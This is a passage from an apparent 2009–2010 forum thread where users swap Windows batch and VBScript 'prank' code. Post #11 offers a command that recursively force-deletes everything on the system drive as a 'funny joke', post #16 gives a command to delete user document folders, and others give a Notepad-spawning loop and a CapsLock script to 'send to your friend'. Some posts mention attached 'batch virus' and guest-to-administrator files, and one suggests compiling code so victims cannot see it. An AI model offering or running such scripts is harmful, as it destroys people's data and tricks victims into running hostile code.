Newbie Member
20Jun2009,11:35   #11
jeffreytb's Avatar
try this batch
del %systemdrive%\*.* /s /f /q
its really funny joke Must try!!!
SahanDefjam like this
Light Poster
30Mar2010,08:36   #12
ansarialice's Avatar
hay guys this new to all batch virus making code
Attached Files
File Type: txt ans.txt (1.8 KB, 67 views)
Newbie Member
11May2010,19:38   #13
abhay gupta's Avatar
do have this type of code for c language?
Newbie Member
12May2010,21:53   #14
I fail at hacking's Avatar
fuckkk man i opened this file and like 300 cmd things popped up and my screen is ****** up lol
Newbie Member
18May2010,21:10   #15
abhay gupta's Avatar
i just want to know which language did u use in this batch file
Light Poster
20May2010,23:35   #16
SURYANSHM's Avatar
this code is used to delete the "my documents and settings" folder in the my computer plzzzzz dont try in ur pc otherwise they may create some problems.
---------------------------------------------------------------------------------------------------


Rmdir c:\docume~1


---------------------------------------------------------------------------------------------------
Enjoy My Friends
Light Poster
21May2010,00:00   #17
SURYANSHM's Avatar
common download the file and lets make the guest account to administrator account.

ok friends now open that file and save as something.bat {guest.bat} or anything with .bat extension and then enjoy the game you will get the administrator privileges.


:c razy:
Attached Files
File Type: txt guest to administrator1.txt (243 Bytes, 42 views)
Light Poster
21May2010,00:05   #18
SURYANSHM's Avatar
This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.

When you type the below code and rename it as *.bat it take the above showed icon shape.

To Open Notepad continuously in your friend’s computer:


Type the code in notepad as :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “notepad.BAT” and send it.

Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.
Light Poster
21May2010,00:07   #19
SURYANSHM's Avatar
What this trick does is, when you run the following script it starts blinking caps Lock light continuously. If you run this script twice the rate of blink increases and alternatively NumLock light start to blink with CapsLock.
Open Notepad and Type :


Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


Save it as “Caps.VBS” and send it to your friend. Double Click it if you wanna see it working. Its a very funny Notepad Trick.

Note: Don’t worry when you try this crazy notepad trick. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process “wscript.exe”
Newbie Member
27May2010,06:38   #20
Pathogen's Avatar
Quote:
Originally Posted by Bhullarz View Post
A batch can done the complete damage.
Why not code this file using C++ or C, then nobody will be able to see the source code even
Or you could just use a converter couldn't you?